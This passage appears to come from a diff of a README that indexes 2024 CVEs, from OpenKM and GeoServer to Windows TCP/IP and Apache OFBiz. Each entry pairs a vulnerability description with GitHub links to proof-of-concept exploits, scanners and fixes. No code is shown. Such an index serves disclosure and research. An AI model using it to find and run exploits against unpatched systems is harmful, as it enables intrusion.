arbitrary SQL commands via the password parameter. + + +- [dovankha/CVE-2024-35469](https://github.com/dovankha/CVE-2024-35469) + +### CVE-2024-35475 (-) + +A Cross-Site Request Forgery (CSRF) vulnerability was discovered in OpenKM Community Edition on or before version 6.3.12. The vulnerability exists in /admin/DatabaseQuery, which allows an attacker to manipulate a victim with administrative privileges to execute arbitrary SQL commands. + + +- [carsonchan12345/CVE-2024-35475](https://github.com/carsonchan12345/CVE-2024-35475) + +### CVE-2024-35511 (-) + +phpgurukul Men Salon Management System v2.0 is vulnerable to SQL Injection via the "username" parameter of /msms/admin/index.php. + + +- [efekaanakkar/CVE-2024-35511](https://github.com/efekaanakkar/CVE-2024-35511) + +### CVE-2024-35538 (2024-08-19) + +Typecho v1.3.0 was discovered to contain a Client IP Spoofing vulnerability, which allows attackers to falsify their IP addresses by specifying an arbitrary IP as value of X-Forwarded-For or Client-Ip headers while performing HTTP requests. + + +- [cyberaz0r/Typecho-Multiple-Vulnerabilities](https://github.com/cyberaz0r/Typecho-Multiple-Vulnerabilities) + +### CVE-2024-35584 (2024-10-15) + +SQL injection vulnerabilities were discovered in Ajax.php, ForWindow.php, ForExport.php, Modules.php, functions/HackingLogFnc.php in OpenSis Community Edition 9.1 to 8.0, and possibly earlier versions. It is possible for an authenticated user to perform SQL Injection due to the lack to sanitisation. The application takes arbitrary value from "X-Forwarded-For" header and appends it to a SQL INSERT statement directly, leading to SQL Injection. + + +- [whwhwh96/CVE-2024-35584](https://github.com/whwhwh96/CVE-2024-35584) + +### CVE-2024-36079 (-) + +An issue was discovered in Vaultize 21.07.27. When uploading files, there is no check that the filename parameter is correct. As a result, a temporary file will be created outside the specified directory when the file is downloaded. To exploit this, an authenticated user would upload a file with an incorrect file name, and then download it. + + +- [DxRvs/vaultize_CVE-2024-36079](https://github.com/DxRvs/vaultize_CVE-2024-36079) + +### CVE-2024-36104 (2024-06-04) + +Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in Apache OFBiz. This issue affects Apache OFBiz: before 18.12.14.\n\nUsers are recommended to upgrade to version 18.12.14, which fixes the issue.\n\n + + +- [ggfzx/CVE-2024-36104](https://github.com/ggfzx/CVE-2024-36104) + +### CVE-2024-36401 (2024-07-01) + +GeoServer is an open source server that allows users to share and edit geospatial data. Prior to versions 2.23.6, 2.24.4, and 2.25.2, multiple OGC request parameters allow Remote Code Execution (RCE) by unauthenticated users through specially crafted input against a default GeoServer installation due to unsafely evaluating property names as XPath expressions.\n\nThe GeoTools library API that GeoServer calls evaluates property/attribute names for feature types in a way that unsafely passes them to the commons-jxpath library which can execute arbitrary code when evaluating XPath expressions. This XPath evaluation is intended to be used only by complex feature types (i.e., Application Schema data stores) but is incorrectly being applied to simple feature types as well which makes this vulnerability apply to **ALL** GeoServer instances. No public PoC is provided but this vulnerability has been confirmed to be exploitable through WFS GetFeature, WFS GetPropertyValue, WMS GetMap, WMS GetFeatureInfo, WMS GetLegendGraphic and WPS Execute requests. This vulnerability can lead to executing arbitrary code.\n\nVersions 2.23.6, 2.24.4, and 2.25.2 contain a patch for the issue. A workaround exists by removing the `gt-complex-x.y.jar` file from the GeoServer where `x.y` is the GeoTools version (e.g., `gt-complex-31.1.jar` if running GeoServer 2.25.1). This will remove the vulnerable code from GeoServer but may break some GeoServer functionality or prevent GeoServer from deploying if the gt-complex module is needed. + + +- [bigb0x/CVE-2024-36401](https://github.com/bigb0x/CVE-2024-36401) +- [Niuwoo/CVE-2024-36401](https://github.com/Niuwoo/CVE-2024-36401) +- [RevoltSecurities/CVE-2024-36401](https://github.com/RevoltSecurities/CVE-2024-36401) +- [Mr-xn/CVE-2024-36401](https://github.com/Mr-xn/CVE-2024-36401) +- [jakabakos/CVE-2024-36401-GeoServer-RCE](https://github.com/jakabakos/CVE-2024-36401-GeoServer-RCE) +- [ahisec/geoserver-](https://github.com/ahisec/geoserver-) +- [Chocapikk/CVE-2024-36401](https://github.com/Chocapikk/CVE-2024-36401) +- [yisas93/CVE-2024-36401-PoC](https://github.com/yisas93/CVE-2024-36401-PoC) +- [justin-p/geoexplorer](https://github.com/justin-p/geoexplorer) +- [daniellowrie/CVE-2024-36401-PoC](https://github.com/daniellowrie/CVE-2024-36401-PoC) +- [punitdarji/GeoServer-CVE-2024-36401](https://github.com/punitdarji/GeoServer-CVE-2024-36401) +- [netuseradministrator/CVE-2024-36401](https://github.com/netuseradministrator/CVE-2024-36401) +- [kkhackz0013/CVE-2024-36401](https://github.com/kkhackz0013/CVE-2024-36401) +- [thestar0/CVE-2024-36401-WoodpeckerPlugin](https://github.com/thestar0/CVE-2024-36401-WoodpeckerPlugin) +- [XiaomingX/cve-2024-36401-poc](https://github.com/XiaomingX/cve-2024-36401-poc) +- [0x0d3ad/CVE-2024-36401](https://github.com/0x0d3ad/CVE-2024-36401) + +### CVE-2024-36416 (2024-06-10) + +SuiteCRM is an open-source Customer Relationship Management (CRM) software application. Prior to versions 7.14.4 and 8.6.1, a deprecated v4 API example with no log rotation allows denial of service by logging excessive data. Versions 7.14.4 and 8.6.1 contain a fix for this issue. + + +- [kva55/CVE-2024-36416](https://github.com/kva55/CVE-2024-36416) + +### CVE-2024-36424 (2024-08-06) + +K7RKScan.sys in K7 Ultimate Security before 17.0.2019 allows local users to cause a denial of service (BSOD) because of a NULL pointer dereference. + + +- [secunnix/CVE-2024-36424](https://github.com/secunnix/CVE-2024-36424) + +### CVE-2024-36527 (2024-06-17) + +puppeteer-renderer v.3.2.0 and before is vulnerable to Directory Traversal. Attackers can exploit the URL parameter using the file protocol to read sensitive information from the server. + + +- [bigb0x/CVE-2024-36527](https://github.com/bigb0x/CVE-2024-36527) + +### CVE-2024-36539 (2024-07-24) + +Insecure permissions in contour v1.28.3 allows attackers to access sensitive data and escalate privileges by obtaining the service account's token. + + +- [Abdurahmon3236/CVE-2024-36539](https://github.com/Abdurahmon3236/CVE-2024-36539) + +### CVE-2024-36821 (2024-06-11) + +Insecure permissions in Linksys Velop WiFi 5 (WHW01v1) 1.1.13.202617 allows attackers to escalate privileges from Guest to root. + + +- [IvanGlinkin/CVE-2024-36821](https://github.com/IvanGlinkin/CVE-2024-36821) + +### CVE-2024-36823 (-) + +The encrypt() function of Ninja Core v7.0.0 was discovered to use a weak cryptographic algorithm, leading to a possible leakage of sensitive information. + + +- [JAckLosingHeart/CVE-2024-36823-POC](https://github.com/JAckLosingHeart/CVE-2024-36823-POC) + +### CVE-2024-36837 (2024-06-05) + +SQL Injection vulnerability in CRMEB v.5.2.2 allows a remote attacker to obtain sensitive information via the getProductList function in the ProductController.php file. + + +- [phtcloud-dev/CVE-2024-36837](https://github.com/phtcloud-dev/CVE-2024-36837) +- [lhc321-source/CVE-2024-36837](https://github.com/lhc321-source/CVE-2024-36837) + +### CVE-2024-36842 +- [abbiy/CVE-2024-36842-Backdooring-Oncord-Android-Sterio-](https://github.com/abbiy/CVE-2024-36842-Backdooring-Oncord-Android-Sterio-) + +### CVE-2024-36877 (2024-08-12) + +Micro-Star International Z-series motherboards (Z590, Z490, and Z790) and B-series motherboards (B760, B560, B660, and B460) with firmware 7D25v14, 7D25v17 to 7D25v19, and 7D25v1A to 7D25v1H was discovered to contain a write-what-where condition in the in the SW handler for SMI 0xE3. Motherboard's with the following chipsets are affected: Intel 300, Intel 400, Intel 500, Intel 600, Intel 700, AMD 300, AMD 400, AMD 500, AMD 600 and AMD 700. + + +- [jjensn/CVE-2024-36877](https://github.com/jjensn/CVE-2024-36877) +- [CERTologists/POC-CVE-2024-36877](https://github.com/CERTologists/POC-CVE-2024-36877) + +### CVE-2024-36991 (2024-07-01) + +In Splunk Enterprise on Windows versions below 9.2.2, 9.1.5, and 9.0.10, an attacker could perform a path traversal on the /modules/messaging/ endpoint in Splunk Enterprise on Windows. This vulnerability should only affect Splunk Enterprise on Windows. + + +- [bigb0x/CVE-2024-36991](https://github.com/bigb0x/CVE-2024-36991) +- [Mr-xn/CVE-2024-36991](https://github.com/Mr-xn/CVE-2024-36991) +- [th3gokul/CVE-2024-36991](https://github.com/th3gokul/CVE-2024-36991) +- [sardine-web/CVE-2024-36991](https://github.com/sardine-web/CVE-2024-36991) +- [Cappricio-Securities/CVE-2024-36991](https://github.com/Cappricio-Securities/CVE-2024-36991) + +### CVE-2024-37032 (2024-05-31) + +Ollama before 0.1.34 does not validate the format of the digest (sha256 with 64 hex digits) when getting the model path, and thus mishandles the TestGetBlobsPath test cases such as fewer than 64 hex digits, more than 64 hex digits, or an initial ../ substring. + + +- [Bi0x/CVE-2024-37032](https://github.com/Bi0x/CVE-2024-37032) +- [ahboon/CVE-2024-37032-scanner](https://github.com/ahboon/CVE-2024-37032-scanner) + +### CVE-2024-37051 (2024-06-10) + +GitHub access token could be exposed to third-party sites in JetBrains IDEs after version 2023.1 and less than: IntelliJ IDEA 2023.1.7, 2023.2.7, 2023.3.7, 2024.1.3, 2024.2 EAP3; Aqua 2024.1.2; CLion 2023.1.7, 2023.2.4, 2023.3.5, 2024.1.3, 2024.2 EAP2; DataGrip 2023.1.3, 2023.2.4, 2023.3.5, 2024.1.4; DataSpell 2023.1.6, 2023.2.7, 2023.3.6, 2024.1.2, 2024.2 EAP1; GoLand 2023.1.6, 2023.2.7, 2023.3.7, 2024.1.3, 2024.2 EAP3; MPS 2023.2.1, 2023.3.1, 2024.1 EAP2; PhpStorm 2023.1.6, 2023.2.6, 2023.3.7, 2024.1.3, 2024.2 EAP3; PyCharm 2023.1.6, 2023.2.7, 2023.3.6, 2024.1.3, 2024.2 EAP2; Rider 2023.1.7, 2023.2.5, 2023.3.6, 2024.1.3; RubyMine 2023.1.7, 2023.2.7, 2023.3.7, 2024.1.3, 2024.2 EAP4; RustRover 2024.1.1; WebStorm 2023.1.6, 2023.2.7, 2023.3.7, 2024.1.4 + + +- [LeadroyaL/CVE-2024-37051-EXP](https://github.com/LeadroyaL/CVE-2024-37051-EXP) +- [mrblackstar26/CVE-2024-37051](https://github.com/mrblackstar26/CVE-2024-37051) + +### CVE-2024-37081 (2024-06-18) + +The vCenter Server contains multiple local privilege escalation vulnerabilities due to misconfiguration of sudo. An authenticated local user with non-administrative privileges may exploit these issues to elevate privileges to root on vCenter Server Appliance. + + +- [mbadanoiu/CVE-2024-37081](https://github.com/mbadanoiu/CVE-2024-37081) +- [Mr-r00t11/CVE-2024-37081](https://github.com/Mr-r00t11/CVE-2024-37081) +- [CERTologists/-CVE-2024-37081-POC](https://github.com/CERTologists/-CVE-2024-37081-POC) +- [CERTologists/Modified-CVE-2024-37081-POC](https://github.com/CERTologists/Modified-CVE-2024-37081-POC) + +### CVE-2024-37084 (2024-07-25) + +In Spring Cloud Data Flow versions prior to 2.11.4,  a malicious user who has access to the Skipper server api can use a crafted upload request to write an arbitrary file to any location on the file system which could lead to compromising the server + + +- [Kayiyan/CVE-2024-37084-Poc](https://github.com/Kayiyan/CVE-2024-37084-Poc) +- [vuhz/CVE-2024-37084](https://github.com/vuhz/CVE-2024-37084) +- [Ly4j/CVE-2024-37084-Exp](https://github.com/Ly4j/CVE-2024-37084-Exp) +- [A0be/CVE-2024-37084-Exp](https://github.com/A0be/CVE-2024-37084-Exp) +- [XiaomingX/cve-2024-37084-Poc](https://github.com/XiaomingX/cve-2024-37084-Poc) + +### CVE-2024-37085 (2024-06-25) + +VMware ESXi contains an authentication bypass vulnerability. A malicious actor with sufficient Active Directory (AD) permissions can gain full access to an ESXi host that was previously configured to use AD for user management https://blogs.vmware.com/vsphere/2012/09/joining-vsphere-hosts-to-active-directory.html by re-creating the configured AD group ('ESXi Admins' by default) after it was deleted from AD. + + +- [mahmutaymahmutay/CVE-2024-37085](https://github.com/mahmutaymahmutay/CVE-2024-37085) +- [Florian-Hoth/CVE-2024-37085-RCE-POC](https://github.com/Florian-Hoth/CVE-2024-37085-RCE-POC) +- [WTN-arny/Vmware-ESXI](https://github.com/WTN-arny/Vmware-ESXI) +- [WTN-arny/CVE-2024-37085](https://github.com/WTN-arny/CVE-2024-37085) + +### CVE-2024-37147 (2024-07-10) + +GLPI is an open-source asset and IT management software package that provides ITIL Service Desk features, licenses tracking and software auditing. An authenticated user can attach a document to any item, even if the user has no write access on it. Upgrade to 10.0.16. + + +- [0xmupa/CVE-2024-37147-PoC](https://github.com/0xmupa/CVE-2024-37147-PoC) + +### CVE-2024-37383 (2024-06-07) + +Roundcube Webmail before 1.5.7 and 1.6.x before 1.6.7 allows XSS via SVG animate attributes. + + +- [bartfroklage/CVE-2024-37383-POC](https://github.com/bartfroklage/CVE-2024-37383-POC) +- [amirzargham/CVE-2024-37383-exploit](https://github.com/amirzargham/CVE-2024-37383-exploit) + +### CVE-2024-37393 (2024-06-10) + +Multiple LDAP injections vulnerabilities exist in SecurEnvoy MFA before 9.4.514 due to improper validation of user-supplied input. An unauthenticated remote attacker could exfiltrate data from Active Directory through blind LDAP injection attacks against the DESKTOP service exposed on the /secserver HTTP endpoint. This may include ms-Mcs-AdmPwd, which has a cleartext password for the Local Administrator Password Solution (LAPS) feature. + + +- [noways-io/securenvoy-cve-2024-37393](https://github.com/noways-io/securenvoy-cve-2024-37393) + +### CVE-2024-37726 (2024-07-03) + +Insecure Permissions vulnerability in Micro-Star International Co., Ltd MSI Center v.2.0.36.0 allows a local attacker to escalate privileges via the Export System Info function in MSI.CentralServer.exe + + +- [carsonchan12345/CVE-2024-37726-MSI-Center-Local-Privilege-Escalation](https://github.com/carsonchan12345/CVE-2024-37726-MSI-Center-Local-Privilege-Escalation) +- [NextGenPentesters/CVE-2024-37726-MSI-Center-Local-Privilege-Escalation](https://github.com/NextGenPentesters/CVE-2024-37726-MSI-Center-Local-Privilege-Escalation) + +### CVE-2024-37742 (2024-06-25) + +Insecure Access Control in Safe Exam Browser (SEB) = 3.5.0 on Windows. The vulnerability allows an attacker to share clipboard data between the SEB kiosk mode and the underlying system, compromising exam integrity. By exploiting this flaw, an attacker can bypass exam controls and gain an unfair advantage during exams. + + +- [cha0sk3rn3l/CVE-2024-37742](https://github.com/cha0sk3rn3l/CVE-2024-37742) + +### CVE-2024-37759 (2024-06-24) + +DataGear v5.0.0 and earlier was discovered to contain a SpEL (Spring Expression Language) expression injection vulnerability via the Data Viewing interface. + + +- [crumbledwall/CVE-2024-37759_PoC](https://github.com/crumbledwall/CVE-2024-37759_PoC) + +### CVE-2024-37762 (2024-07-01) + +MachForm up to version 21 is affected by an authenticated unrestricted file upload which leads to a remote code execution. + + +- [Atreb92/cve-2024-37762](https://github.com/Atreb92/cve-2024-37762) + +### CVE-2024-37763 (2024-07-01) + +MachForm up to version 19 is affected by an unauthenticated stored cross-site scripting which affects users with valid sessions whom can view compiled forms results. + + +- [Atreb92/cve-2024-37763](https://github.com/Atreb92/cve-2024-37763) + +### CVE-2024-37764 (2024-07-01) + +MachForm up to version 19 is affected by an authenticated stored cross-site scripting. + + +- [Atreb92/cve-2024-37764](https://github.com/Atreb92/cve-2024-37764) + +### CVE-2024-37765 (2024-07-01) + +Machform up to version 19 is affected by an authenticated Blind SQL injection in the user account settings page. + + +- [Atreb92/cve-2024-37765](https://github.com/Atreb92/cve-2024-37765) + +### CVE-2024-37770 (2024-07-10) + +14Finger v1.1 was discovered to contain a remote command execution (RCE) vulnerability in the fingerprint function. This vulnerability allows attackers to execute arbitrary commands via a crafted payload. + + +- [k3ppf0r/CVE-2024-37770](https://github.com/k3ppf0r/CVE-2024-37770) + +### CVE-2024-37791 (2024-06-18) + +DuxCMS3 v3.1.3 was discovered to contain a SQL injection vulnerability via the keyword parameter at /article/Content/index?class_id. + + +- [czheisenberg/CVE-2024-37791](https://github.com/czheisenberg/CVE-2024-37791) + +### CVE-2024-37843 (2024-06-25) + +Craft CMS up to v3.7.31 was discovered to contain a SQL injection vulnerability via the GraphQL API endpoint. + + +- [gsmith257-cyber/CVE-2024-37843-POC](https://github.com/gsmith257-cyber/CVE-2024-37843-POC) + +### CVE-2024-37888 (2024-06-14) + +The Open Link is a CKEditor plugin, extending context menu with a possibility to open link in a new tab. The vulnerability allowed to execute JavaScript code by abusing link href attribute. It affects all users using the Open Link plugin at version < **1.0.5**. + + +- [7Ragnarok7/CVE-2024-37888](https://github.com/7Ragnarok7/CVE-2024-37888) + +### CVE-2024-37889 (2024-06-14) + +MyFinances is a web application for managing finances. MyFinances has a way to access other customer invoices while signed in as a user. This method allows an actor to access PII and financial information from another account. The vulnerability is fixed in 0.4.6. + + +- [uname-s/CVE-2024-37889](https://github.com/uname-s/CVE-2024-37889) + +### CVE-2024-38036 (2024-10-04) + +There is a reflected XSS vulnerability in Esri Portal for ArcGIS versions 10.9.1, 10.8.1 and 10.7.1 which may allow a remote, unauthenticated attacker to create a crafted link which when clicked could potentially execute arbitrary JavaScript code in the victim’s browser. + + +- [hnytgl/CVE-2024-38036](https://github.com/hnytgl/CVE-2024-38036) + +### CVE-2024-38041 (2024-07-09) + +Windows Kernel Information Disclosure Vulnerability + + +- [varwara/CVE-2024-38041](https://github.com/varwara/CVE-2024-38041) + +### CVE-2024-38063 (2024-08-13) + +Windows TCP/IP Remote Code Execution Vulnerability + + +- [diegoalbuquerque/CVE-2024-38063](https://github.com/diegoalbuquerque/CVE-2024-38063) +- [noradlb1/CVE-2024-38063-VB](https://github.com/noradlb1/CVE-2024-38063-VB) +- [Sachinart/CVE-2024-38063-poc](https://github.com/Sachinart/CVE-2024-38063-poc) +- [p33d/cve-2024-38063](https://github.com/p33d/cve-2024-38063) +- [dweger-scripts/CVE-2024-38063-Remediation](https://github.com/dweger-scripts/CVE-2024-38063-Remediation) +- [almogopp/Disable-IPv6-CVE-2024-38063-Fix](https://github.com/almogopp/Disable-IPv6-CVE-2024-38063-Fix) +- [Th3Tr1ckst3r/CVE-2024-38063](https://github.com/Th3Tr1ckst3r/CVE-2024-38063) +- [haroonawanofficial/CVE-2024-38063-Research-Tool](https://github.com/haroonawanofficial/CVE-2024-38063-Research-Tool) +- [ynwarcs/CVE-2024-38063](https://github.com/ynwarcs/CVE-2024-38063) +- [patchpoint/CVE-2024-38063](https://github.com/patchpoint/CVE-2024-38063) +- [PumpkinBridge/Windows-CVE-2024-38063](https://github.com/PumpkinBridge/Windows-CVE-2024-38063) +- [zenzue/CVE-2024-38063-POC](https://github.com/zenzue/CVE-2024-38063-POC) +- [AdminPentester/CVE-2024-38063-](https://github.com/AdminPentester/CVE-2024-38063-) +- [ThemeHackers/CVE-2024-38063](https://github.com/ThemeHackers/CVE-2024-38063) +- [KernelKraze/CVE-2024-38063_PoC](https://github.com/KernelKraze/CVE-2024-38063_PoC) +- [ps-interactive/cve-2024-38063](https://github.com/ps-interactive/cve-2024-38063) +- [Brownpanda29/Cve-2024-38063](https://github.com/Brownpanda29/Cve-2024-38063) +- [FrancescoDiSalesGithub/quick-fix-cve-2024-38063](https://github.com/FrancescoDiSalesGithub/quick-fix-cve-2024-38063) +- [Faizan-Khanx/CVE-2024-38063](https://github.com/Faizan-Khanx/CVE-2024-38063) +- [ArenaldyP/CVE-2024-38063-Medium](https://github.com/ArenaldyP/CVE-2024-38063-Medium) +- [lnx-dvlpr/cve-2024-38063](https://github.com/lnx-dvlpr/cve-2024-38063) +- [becrevex/CVE-2024-38063](https://github.com/becrevex/CVE-2024-38063) +- [idkwastaken/CVE-2024-38063](https://github.com/idkwastaken/CVE-2024-38063) +- [thanawee321/CVE-2024-38063](https://github.com/thanawee321/CVE-2024-38063) +- [AliHj98/cve-2024-38063-Anonyvader](https://github.com/AliHj98/cve-2024-38063-Anonyvader) +- [Dragkob/CVE-2024-38063](https://github.com/Dragkob/CVE-2024-38063) +- [selenagomez25/CVE-2024-38063](https://github.com/selenagomez25/CVE-2024-38063) +- [Laukage/Windows-CVE-2024-38063](https://github.com/Laukage/Windows-CVE-2024-38063) +- [jamesbishop785/CVE-2024-38063](https://github.com/jamesbishop785/CVE-2024-38063) + +### CVE-2024-38077 (2024-07-09) + +Windows Remote Desktop Licensing Service Remote Code Execution Vulnerability + + +- [SecStarBot/CVE-2024-38077-POC](https://github.com/SecStarBot/CVE-2024-38077-POC) +- [qi4L/CVE-2024-38077](https://github.com/qi4L/CVE-2024-38077) +- [Sec-Link/CVE-2024-38077](https://github.com/Sec-Link/CVE-2024-38077) +- [murphysecurity/RDL-detect](https://github.com/murphysecurity/RDL-detect) +- [Wlibang/CVE-2024-38077](https://github.com/Wlibang/CVE-2024-38077) +- [psl-b/CVE-2024-38077-check](https://github.com/psl-b/CVE-2024-38077-check) +- [zhuxi1965/CVE-2024-38077-RDLCheck](https://github.com/zhuxi1965/CVE-2024-38077-RDLCheck) +- [lworld0x00/CVE-2024-38077-notes](https://github.com/lworld0x00/CVE-2024-38077-notes) +- [atlassion/CVE-2024-38077-check](https://github.com/atlassion/CVE-2024-38077-check) +- [BBD-YZZ/fyne-gui](https://github.com/BBD-YZZ/fyne-gui) +- [Destiny0991/check_38077](https://github.com/Destiny0991/check_38077) +- [mrmtwoj/CVE-2024-38077](https://github.com/mrmtwoj/CVE-2024-38077) +- [amfg145/CVE-2024-38077](https://github.com/amfg145/CVE-2024-38077) + +### CVE-2024-38080 (2024-07-09) + +Windows Hyper-V Elevation of Privilege Vulnerability + + +- [pwndorei/CVE-2024-38080](https://github.com/pwndorei/CVE-2024-38080) + +### CVE-2024-38100 (2024-07-09) + +Windows File Explorer Elevation of Privilege Vulnerability + + +- [Florian-Hoth/CVE-2024-38100-RCE-POC](https://github.com/Florian-Hoth/CVE-2024-38100-RCE-POC) + +### CVE-2024-38124 (2024-10-08) + +Windows Netlogon Elevation of Privilege Vulnerability + + +- [tadash10/Detailed-Analysis-and-Mitigation-Strategies-for-CVE-2024-38124-and-CVE-2024-43468](https://github.com/tadash10/Detailed-Analysis-and-Mitigation-Strategies-for-CVE-2024-38124-and-CVE-2024-43468) + +### CVE-2024-38127 (2024-08-13) + +Windows Hyper-V Elevation of Privilege Vulnerability + + +- [pwndorei/CVE-2024-38127](https://github.com/pwndorei/CVE-2024-38127) + +### CVE-2024-38144 (2024-08-13) + +Kernel Streaming WOW Thunk Service Driver Elevation of Privilege Vulnerability + + +- [Dor00tkit/CVE-2024-38144](https://github.com/Dor00tkit/CVE-2024-38144) + +### CVE-2024-38189 (2024-08-13) + +Microsoft Project Remote Code Execution Vulnerability + + +- [vx7z/CVE-2024-38189](https://github.com/vx7z/CVE-2024-38189) + +### CVE-2024-38193 (2024-08-13) + +Windows Ancillary Function Driver for WinSock Elevation of Privilege Vulnerability + + +- [killvxk/CVE-2024-38193-Nephster](https://github.com/killvxk/CVE-2024-38193-Nephster) + +### CVE-2024-38200 (2024-08-08) + +Microsoft Office Spoofing Vulnerability + + +- [passtheticket/CVE-2024-38200](https://github.com/passtheticket/CVE-2024-38200) + +### CVE-2024-38366 (2024-07-01) + +trunk.cocoapods.org is the authentication server for the CoacoaPods dependency manager. The part of trunk which verifies whether a user has a real email address on signup used a rfc-822 library which executes a shell command to validate the email domain MX records validity. It works via an DNS MX. This lookup could be manipulated to also execute a command on the trunk server, effectively giving root access to the server and the infrastructure. This issue was patched server-side with commit 001cc3a430e75a16307f5fd6cdff1363ad2f40f3 in September 2023. This RCE triggered a full user-session reset, as an attacker could have used this method to write to any Podspec in trunk. + + +- [ReeFSpeK/CocoaPods-RCE_CVE-2024-38366](https://github.com/ReeFSpeK/CocoaPods-RCE_CVE-2024-38366) + +### CVE-2024-38396 (2024-06-16) + +An issue was discovered in iTerm2 3.5.x before 3.5.2. Unfiltered use of an escape sequence to report a window title, in combination with the built-in tmux integration feature (enabled by default), allows an attacker to inject arbitrary code into the terminal, a different vulnerability than CVE-2024-38395. + + +- [vin01/poc-cve-2024-38396](https://github.com/vin01/poc-cve-2024-38396) + +### CVE-2024-38472 (2024-07-01) + +SSRF in Apache HTTP Server on Windows allows to potentially leak NTLM hashes to a malicious server via SSRF and malicious requests or content \nUsers are recommended to upgrade to version 2.4.60 which fixes this issue.  Note: Existing configurations that access UNC paths will have to configure new directive "UNCList" to allow access during request processing. + + +- [Abdurahmon3236/CVE-2024-38472](https://github.com/Abdurahmon3236/CVE-2024-38472) +- [mrmtwoj/apache-vulnerability-testing](https://github.com/mrmtwoj/apache-vulnerability-testing) + +### CVE-2024-38473 (2024-07-01) + +Encoding problem in mod_proxy in Apache HTTP Server 2.4.59 and earlier allows request URLs with incorrect encoding to be sent to backend services, potentially bypassing authentication via crafted requests.\nUsers are recommended to upgrade to version 2.4.60, which fixes this issue. + + +- [Abdurahmon3236/CVE-2024-38473](https://github.com/Abdurahmon3236/CVE-2024-38473) +- [juanschallibaum/CVE-2024-38473-Nuclei-Template](https://github.com/juanschallibaum/CVE-2024-38473-Nuclei-Template) + +### CVE-2024-38475 (2024-07-01) + +Improper escaping of output in mod_rewrite in Apache HTTP Server 2.4.59 and earlier allows an attacker to map URLs to filesystem locations that are permitted to be served by the server but are not intentionally/directly reachable by any URL, resulting in code execution or source code disclosure. \n\nSubstitutions in server context that use a backreferences or variables as the first segment of the substitution are affected.  Some unsafe RewiteRules will be broken by this change and the rewrite flag "UnsafePrefixStat" can be used to opt back in once ensuring the substitution is appropriately constrained. + + +- [p0in7s/CVE-2024-38475](https://github.com/p0in7s/CVE-2024-38475) +- [soltanali0/CVE-2024-38475](https://github.com/soltanali0/CVE-2024-38475) + +### CVE-2024-38526 (2024-06-25) + +pdoc provides API Documentation for Python Projects. Documentation generated with `pdoc --math` linked to JavaScript files from polyfill.io. The polyfill.io CDN has been sold and now serves malicious code. This issue has been fixed in pdoc 14.5.1. + + +- [putget/pollypull](https://github.com/putget/pollypull) + +### CVE-2024-38537 (2024-07-02) + +Fides is an open-source privacy engineering platform. `fides.js`, a client-side script used to interact with the consent management features of Fides, used the `polyfill.io` domain in a very limited edge case, when it detected a legacy browser such as IE11 that did not support the fetch standard. Therefore it was possible for users of legacy, pre-2017 browsers who navigate to a page serving `fides.js` to download and execute malicious scripts from the `polyfill.io` domain when the domain was compromised and serving malware. No exploitation of `fides.js` via `polyfill.io` has been identified as of time of publication.\n\nThe vulnerability has been patched in Fides version `2.39.1`. Users are advised to upgrade to this version or later to secure their systems against this threat. On Thursday, June 27, 2024, Cloudflare and Namecheap intervened at a domain level to ensure `polyfill.io` and its subdomains could not resolve to the compromised service, rendering this vulnerability unexploitable. Prior to the domain level intervention, there were no server-side workarounds and the confidentiality, integrity, and availability impacts of this vulnerability were high. Clients could ensure they were not affected by using a modern browser that supported the fetch standard. + + +- [Havoc10-sw/Detect_polyfill_CVE-2024-38537-](https://github.com/Havoc10-sw/Detect_polyfill_CVE-2024-38537-) + +### CVE-2024-38793 (2024-08-29) + +Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in PriceListo Best Restaurant Menu by PriceListo allows SQL Injection.This issue affects Best Restaurant Menu by PriceListo: from n/a through 1.4.1. + + +- [ret2desync/CVE-2024-38793-PoC](https://github.com/ret2desync/CVE-2024-38793-PoC) + +### CVE-2024-38816 (2024-09-13) + +Applications serving static resources through the functional web frameworks WebMvc.fn or WebFlux.fn are vulnerable to path traversal attacks. An attacker can craft malicious HTTP requests and obtain any file on the file system that is also accessible to the process in which the Spring application is running.\n\nSpecifically, an application is vulnerable when both of the following are true:\n\n * the web application uses RouterFunctions to serve static resources\n * resource handling is explicitly configured with a FileSystemResource location\n\n\nHowever, malicious requests are blocked and rejected when any of the following is true:\n\n * the Spring Security HTTP Firewall https://docs.spring.io/spring-security/reference/servlet/exploits/firewall.html  is in use\n * the application runs on Tomcat or Jetty + + +- [startsw1th/cve-2024-38816-demo](https://github.com/startsw1th/cve-2024-38816-demo) +- [WULINPIN/CVE-2024-38816-PoC](https://github.com/WULINPIN/CVE-2024-38816-PoC) +- [Galaxy-system/cve-2024-38816](https://github.com/Galaxy-system/cve-2024-38816) +- [Anthony1078/App-vulnerable](https://github.com/Anthony1078/App-vulnerable) +- [wdragondragon/spring-framework](https://github.com/wdragondragon/spring-framework) + +### CVE-2024-38819 (2024-12-19) + +Applications serving static resources through the functional web frameworks WebMvc.fn or WebFlux.fn are vulnerable to path traversal attacks. An attacker can craft malicious HTTP requests and obtain any file on the file system that is also accessible to the process in which the Spring application is running. + + +- [masa42/CVE-2024-38819-POC](https://github.com/masa42/CVE-2024-38819-POC) +- [GhostS3c/CVE-2024-38819](https://github.com/GhostS3c/CVE-2024-38819) + +### CVE-2024-38821 (2024-10-28) + +Spring WebFlux applications that have Spring Security authorization rules on static resources can be bypassed under certain circumstances.\n\nFor this to impact an application, all of the following must be true:\n\n * It must be a WebFlux application\n * It must be using Spring's static resources support\n * It must have a non-permitAll authorization rule applied to the static resources support + + +- [mouadk/cve-2024-38821](https://github.com/mouadk/cve-2024-38821) + +### CVE-2024-38856 (2024-08-05) + +Incorrect Authorization vulnerability in Apache OFBiz.\n\nThis issue affects Apache OFBiz: through 18.12.14.\n\nUsers are recommended to upgrade to version 18.12.15, which fixes the issue.\n\nUnauthenticated endpoints could allow execution of screen rendering code of screens if some preconditions are met (such as when the screen definitions don't explicitly check user's permissions because they rely on the configuration of their endpoints). + + +- [securelayer7/CVE-2024-38856_Scanner](https://github.com/securelayer7/CVE-2024-38856_Scanner) +- [ThatNotEasy/CVE-2024-38856](https://github.com/ThatNotEasy/CVE-2024-38856) +- [Praison001/CVE-2024-38856-ApacheOfBiz](https://github.com/Praison001/CVE-2024-38856-ApacheOfBiz) +- [0x20c/CVE-2024-38856-EXP](https://github.com/0x20c/CVE-2024-38856-EXP) +- [emanueldosreis/CVE-2024-38856](https://github.com/emanueldosreis/CVE-2024-38856) +- [BBD-YZZ/CVE-2024-38856-RCE](https://github.com/BBD-YZZ/CVE-2024-38856-RCE) +- [XiaomingX/cve-2024-38856-poc](https://github.com/XiaomingX/cve-2024-38856-poc) +- 